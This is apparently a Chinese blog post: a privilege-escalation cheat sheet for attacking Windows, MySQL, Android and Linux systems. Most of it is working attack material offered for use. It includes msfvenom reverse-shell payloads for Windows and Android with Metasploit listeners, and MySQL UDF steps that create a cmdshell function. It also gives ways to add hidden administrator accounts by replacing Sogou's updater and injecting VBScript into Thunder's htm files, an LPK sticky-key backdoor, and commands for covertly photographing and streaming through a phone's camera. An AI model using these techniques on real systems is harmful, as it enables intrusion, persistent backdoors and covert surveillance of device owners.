提权

122 阅读2分钟

携手创作,共同成长!这是我参与「掘金日新计划 · 8 月更文挑战」的第23天,点击查看活动详情

基础提权

常用命令

whoami
net user 
net user hack hack /add
net user hack$ hack /add  仅仅Net user是看不到的
net user localgroup administrators hack /add
tasklist /svc  查看远程连接的端口  寻找termservice pid
netstat -ano查看端口占用情况

 

msf生成木马

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.199.144 lport=12345 -f exe >test.exe //x64根据情况

开始监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.199.144
set lport 12345
exploit

https支持端口443 2053 2083 2096

cs生成木马

攻击->生成后门

Z1->信息收集->sharpAVKB(杀软和补丁对比)

getsystem

meterpreter的getsystem命令,实际是针对windows的管理员组的用户的一种提权方式,当用户不在管理员组时,我们通常会通过系统的溢出漏洞进行提权。而当所得用户权限在管理员组时,我们需要先绕过UAC,然后使用getsystem命令进行提权即可。

 

mysql提权

udf提权

必须是root权限

数据库信息一般存放在inc文件夹下,例config.php conn.php等

在有insert和delete权限后,就可以在mysql中创建函数 来攻击mysql

udf条件

mysql>5.1 mysql\lib\plugin
mysql<5.1 c:\windows

dll文件提权

上传udf.dll,进入shell.php,链接数据库,执行

在udfeval表中利用longblob创建二进制形式文本数据shellcode
create table udfeval(shellcode longblob);


将udf.dll内容传到udfeval中
insert into udfeval values(load_file("C:\udf.dll"));


再讲shellcode中udf.dll二进制内容传到mysql的plugin中
select shellcode from udfeval into dumpfile "C://phpstudy//MySQL//lib//plugin//udf.dll";


创建cmdshell函数
create function cmdshell returns string soname 'udf.dll';


命令执行
select cmdshell('whoami');

执行完毕后,若需恢复环境

#查看是否创建cmdshell函数
select * from mysql.func where name = 'cmdshell'; 


删除cmdshell函数
drop function cmdshell; 


删除创建的udfeval表
drop table udfeval

udf.php提权

向目标路径导入udf.dll文件后,执行命令即可

 

第三方提权

搜狗输入法提权

通过注册表查看安装程序

shell.aspx ->RegShell ->HKEY_LOCAL_MACHINE\SOFTWARE\

发现安装路径

查看权限,everyone权限

搜狗中有个PinyinUp.exe更新程序可以替换掉进行提权

Quick Batch File Compiler 编写PinyinUp.exe程序

@echo off
@net user hack hack /add
@net localgroup administrators hack /add

编译后替换原文件中的PinyinUp.exe,更新词库,调用PinyinUp.ext

查看管理员组,发现加入hack账户

net localgroup administrators

LPK劫持

设置键1:65(A) 键2:83(S) 登录密码:admin 生成dll文件

放到navicat配置文件中

重启mysql服务,mstsc远程连接,按五下shift键,弹出框输入密码AS登录成功

Cmdshell->whoami发现system权限

安卓手机

生成apk文件

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.199.153 LPORT=4444 R > shell.apk

放入AndroidKiller修改APP名保存并编译

 

msf设置payload并监听

msfconsole
use exploit/multi/handler 
设置payload
set payload android/meterpreter/reverse_tcp
set lhost 192.168.199.152
set lport 4444
查看配置
show options
运行
run

将shell.apk放入模拟器运行,监听到后执行命令

功能

sysinfo查看安卓版本
app_list 查看app
webcam_list 列出手机摄像头个数
webcam_snap 拍照
webcam_stream -i 1 开摄像头

迅雷提权

\Thunder\Program\目录下有两个htm文件,getAllurl.htm、geturl.htm

当我们使用迅雷下载东西的时候,会调用该文件文件,去激活htm文件里的我们写入的代码

htm文件加入如下代码,用迅雷下载后即可创建administrators组的一个用户

<script language="VBScript">
Set vbs=CreateObject("Wscript.Shell")
vbs.run "cmd /c net user hack hack /add",0
vbs.run "cmd /c net localgroup administrators hack/add",0
</script>

 

linux提权

ubuntu

uname -a查内核

cat /etc/*release

centos

uname -a查内核

rpm -qa |grep glibc 查看版本

exploit-db.com

nc监听

GNU glibc 动态链接器